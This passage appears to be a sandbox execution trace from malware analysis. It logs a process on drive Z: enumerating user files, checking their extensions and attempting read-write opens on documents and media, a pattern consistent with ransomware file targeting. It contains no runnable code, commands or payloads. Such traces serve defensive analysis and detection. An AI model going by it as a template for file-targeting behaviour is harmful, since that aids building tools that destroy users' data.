lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd8b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fSdZCoMsu.ppt", cAlternateFileName="")) returned 1 [0178.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.033] PathFindExtensionW (pszPath="Z:\\fSdZCoMsu.ppt") returned=".ppt" [0178.038] CreateFileW (lpFileName="Z:\\fSdZCoMsu.ppt" (normalized: "z:\\fsdzcomsu.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.040] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x90fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qMEqdumGg.xls", cAlternateFileName="")) returned 1 [0178.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.040] PathFindExtensionW (pszPath="Z:\\qMEqdumGg.xls") returned=".xls" [0178.046] CreateFileW (lpFileName="Z:\\qMEqdumGg.xls" (normalized: "z:\\qmeqdumgg.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.047] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xecf9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6bvEhs8ikEXo7i7VwC.odp", cAlternateFileName="")) returned 1 [0178.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.047] PathFindExtensionW (pszPath="Z:\\6bvEhs8ikEXo7i7VwC.odp") returned=".odp" [0178.052] CreateFileW (lpFileName="Z:\\6bvEhs8ikEXo7i7VwC.odp" (normalized: "z:\\6bvehs8ikexo7i7vwc.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.054] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x134b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NDQzoX6pBA3xcoCD4T.pdf", cAlternateFileName="")) returned 1 [0178.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.054] PathFindExtensionW (pszPath="Z:\\NDQzoX6pBA3xcoCD4T.pdf") returned=".pdf" [0178.059] CreateFileW (lpFileName="Z:\\NDQzoX6pBA3xcoCD4T.pdf" (normalized: "z:\\ndqzox6pba3xcocd4t.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.061] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8c67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r0UXmiC.bmp", cAlternateFileName="")) returned 1 [0178.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.061] PathFindExtensionW (pszPath="Z:\\r0UXmiC.bmp") returned=".bmp" [0178.067] CreateFileW (lpFileName="Z:\\r0UXmiC.bmp" (normalized: "z:\\r0uxmic.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.068] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x99c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YsUSMSG.odt", cAlternateFileName="")) returned 1 [0178.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.068] PathFindExtensionW (pszPath="Z:\\YsUSMSG.odt") returned=".odt" [0178.074] CreateFileW (lpFileName="Z:\\YsUSMSG.odt" (normalized: "z:\\ysusmsg.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.075] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1494d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nHAn9S5wXFCiA.avi", cAlternateFileName="")) returned 1 [0178.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.076] PathFindExtensionW (pszPath="Z:\\nHAn9S5wXFCiA.avi") returned=".avi" [0178.081] CreateFileW (lpFileName="Z:\\nHAn9S5wXFCiA.avi" (normalized: "z:\\nhan9s5wxfcia.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.082] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x901e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3w8tH1dj3.avi", cAlternateFileName="")) returned 1 [0178.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.083] PathFindExtensionW (pszPath="Z:\\3w8tH1dj3.avi") returned=".avi" [0178.088] CreateFileW (lpFileName="Z:\\3w8tH1dj3.avi" (normalized: "z:\\3w8th1dj3.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.089] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15a57, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OCrMyD.gif", cAlternateFileName="")) returned 1 [0178.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.089] PathFindExtensionW (pszPath="Z:\\OCrMyD.gif") returned=".gif" [0178.094] CreateFileW (lpFileName="Z:\\OCrMyD.gif" (normalized: "z:\\ocrmyd.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.096] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x96e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CO3BSlwl0AGjF6ik7YUj.ods", cAlternateFileName="")) returned 1 [0178.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.097] PathFindExtensionW (pszPath="Z:\\CO3BSlwl0AGjF6ik7YUj.ods") returned=".ods" [0178.102] CreateFileW (lpFileName="Z:\\CO3BSlwl0AGjF6ik7YUj.ods" (normalized: "z:\\co3bslwl0agjf6ik7yuj.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.104] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd2b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8Zpef8RfCY9KqCV7PE.avi", cAlternateFileName="")) returned 1 [0178.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.104] PathFindExtensionW (pszPath="Z:\\8Zpef8RfCY9KqCV7PE.avi") returned=".avi" [0178.109] CreateFileW (lpFileName="Z:\\8Zpef8RfCY9KqCV7PE.avi" (normalized: "z:\\8zpef8rfcy9kqcv7pe.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.111] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe944, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ad6eYrGeF6ADM39N.odt", cAlternateFileName="")) returned 1 [0178.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.111] PathFindExtensionW (pszPath="Z:\\Ad6eYrGeF6ADM39N.odt") returned=".odt" [0178.116] CreateFileW (lpFileName="Z:\\Ad6eYrGeF6ADM39N.odt" (normalized: "z:\\ad6eyrgef6adm39n.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.118] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd0a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TtGiLOV0AbV.jpg", cAlternateFileName="")) returned 1 [0178.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.118] PathFindExtensionW (pszPath="Z:\\TtGiLOV0AbV.jpg") returned=".jpg" [0178.123] CreateFileW (lpFileName="Z:\\TtGiLOV0AbV.jpg" (normalized: "z:\\ttgilov0abv.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.125] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12d87, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rIxvZBz.mp4", cAlternateFileName="")) returned 1 [0178.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.125] PathFindExtensionW (pszPath="Z:\\rIxvZBz.mp4") returned=".mp4" [0178.130] CreateFileW (lpFileName="Z:\\rIxvZBz.mp4" (normalized: "z:\\rixvzbz.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.132] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xee59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ywVBC9F7.mkv", cAlternateFileName="")) returned 1 [0178.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.132] PathFindExtensionW (pszPath="Z:\\ywVBC9F7.mkv") returned=".mkv" [0178.137] CreateFileW (lpFileName="Z:\\ywVBC9F7.mkv" (normalized: "z:\\ywvbc9f7.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.139] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x78b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EWYXiU.png", cAlternateFileName="")) returned 1 [0178.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.139] PathFindExtensionW (pszPath="Z:\\EWYXiU.png") returned=".png" [0178.145] CreateFileW (lpFileName="Z:\\EWYXiU.png" (normalized: "z:\\ewyxiu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.146] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xae3d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yxa8HDFZVHjsem9K2t.pptx", cAlternateFileName="")) returned 1 [0178.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.146] PathFindExtensionW (pszPath="Z:\\Yxa8HDFZVHjsem9K2t.pptx") returned=".pptx" [0178.152] CreateFileW (lpFileName="Z:\\Yxa8HDFZVHjsem9K2t.pptx" (normalized: "z:\\yxa8hdfzvhjsem9k2t.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.153] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xedc3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9RqmGLGyrOcA3.mp3", cAlternateFileName="")) returned 1 [0178.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.153] PathFindExtensionW (pszPath="Z:\\9RqmGLGyrOcA3.mp3") returned=".mp3" [0178.158] CreateFileW (lpFileName="Z:\\9RqmGLGyrOcA3.mp3" (normalized: "z:\\9rqmglgyroca3.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.161] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd7fe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pC3tGDvF.doc", cAlternateFileName="")) returned 1 [0178.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.161] PathFindExtensionW (pszPath="Z:\\pC3tGDvF.doc") returned=".doc" [0178.167] CreateFileW (lpFileName="Z:\\pC3tGDvF.doc" (normalized: "z:\\pc3tgdvf.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.178] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9668, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yn0PYQpVz8.doc", cAlternateFileName="")) returned 1 [0178.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.178] PathFindExtensionW (pszPath="Z:\\Yn0PYQpVz8.doc") returned=".doc" [0178.184] CreateFileW (lpFileName="Z:\\Yn0PYQpVz8.doc" (normalized: "z:\\yn0pyqpvz8.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.185] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x153ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qkovu43RZ2n.odt", cAlternateFileName="")) returned 1 [0178.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.186] PathFindExtensionW (pszPath="Z:\\qkovu43RZ2n.odt") returned=".odt" [0178.191] CreateFileW (lpFileName="Z:\\qkovu43RZ2n.odt" (normalized: "z:\\qkovu43rz2n.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.193] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1663f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EjMAFky9mSGD.mp4", cAlternateFileName="")) returned 1 [0178.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.193] PathFindExtensionW (pszPath="Z:\\EjMAFky9mSGD.mp4") returned=".mp4" [0178.198] CreateFileW (lpFileName="Z:\\EjMAFky9mSGD.mp4" (normalized: "z:\\ejmafky9msgd.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.200] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, 